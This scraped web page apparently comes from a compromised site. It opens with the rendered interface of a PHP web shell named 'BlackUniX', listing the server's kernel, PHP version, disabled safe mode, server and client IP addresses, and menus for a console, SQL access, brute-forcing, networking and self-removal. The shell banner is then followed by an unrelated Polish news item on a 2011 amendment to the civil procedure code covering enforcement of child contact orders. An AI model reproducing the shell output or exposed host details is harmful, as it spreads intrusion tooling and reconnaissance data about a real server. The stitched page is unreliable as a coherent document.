BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-20 11:29:08
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.198.158.24
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Nowelizacja reguluje egzekucję kontaktów z dziećmi.
15.07.2011.
Prezydent Bronisław Komorowski podpisał ustawę o zmianie kodeksu postepowania cywilnego. Zasadniczym celem nowelizacji ustawy jest kompleksowe uregulowanie problematyki wykonywania orzeczeń sądowych dotyczących kontaktów z dziećmi. Podkreślenia wymaga, że rozwiązania w zakresie przymuszenia jednego z rodziców, który nie stosuje się do sposobu kontaktów z dzieckiem ustalonego przez sąd do respektowania tego orzeczenia, funkcjonujące w ramach dotychczasowego stanu prawnego były krytykowane za brak efektywności. Mając na uwadze powyższe, ustawodawca – w celu doprowadzenie do respektowania orzeczeń sądowych ustalających kontakty obojga rodziców z dzieckiem - wprowadza przedmiotową nowelizacją uregulowania, służące zwiększeniu skuteczności stosowanych środków i mające umożliwić sądowi - w sytuacji niewykonywania lub nieprawidłowego wykonywania orzeczenia, zareagowanie w sposób adekwatny do zróżnicowanych stanów faktycznych, zgodnie z zasadą nadrzędności dobra dziecka. Uchwalona ustawa dodaje do Kodeksu postępowania cywilnego nowe przepisy, tj. oddział 6 Sprawy dotyczące wykonywania kontaktów z dzieckiem. Nowelizacja przewiduje wprowadzenie postępowania składającego się z dwóch etapów: w przypadku niezastosowania się do orzeczenia ustalającego kontakty, sąd wydaje postanowienie o zagrożeniu nakazem zapłaty oznaczonej kwoty pieniężnej, na rzecz osoby uprawnionej do kontaktu z dzieckiem, jeżeli zaś zobowiązany nadal nie stosuje się do orzeczenia, sąd nakaże zapłatę za każde naruszenie obowiązku. Uszczegółowienie wprowadzonych nowelizacją zasad zawierają przepisy dotyczące: podstawy wszczęcia postępowania, stwierdzania wykonalności orzeczenia z urzędu, a także uznania za tytuł wykonawczy prawomocnego postanowienia sądu bez potrzeby nadawania klauzuli wykonalności. Za bardzo istotne i trafne rozwiązanie należy uznać zapewnienie w postępowaniu udziału osoby zobowiązanej. Wysokość sumy pieniężnej, o jakiej mowa, jest ustalana przez sąd w zależności od sytuacji majątkowej osoby dokonującej naruszenia oraz stosownie do liczby naruszeń. źródło Prezydent.pl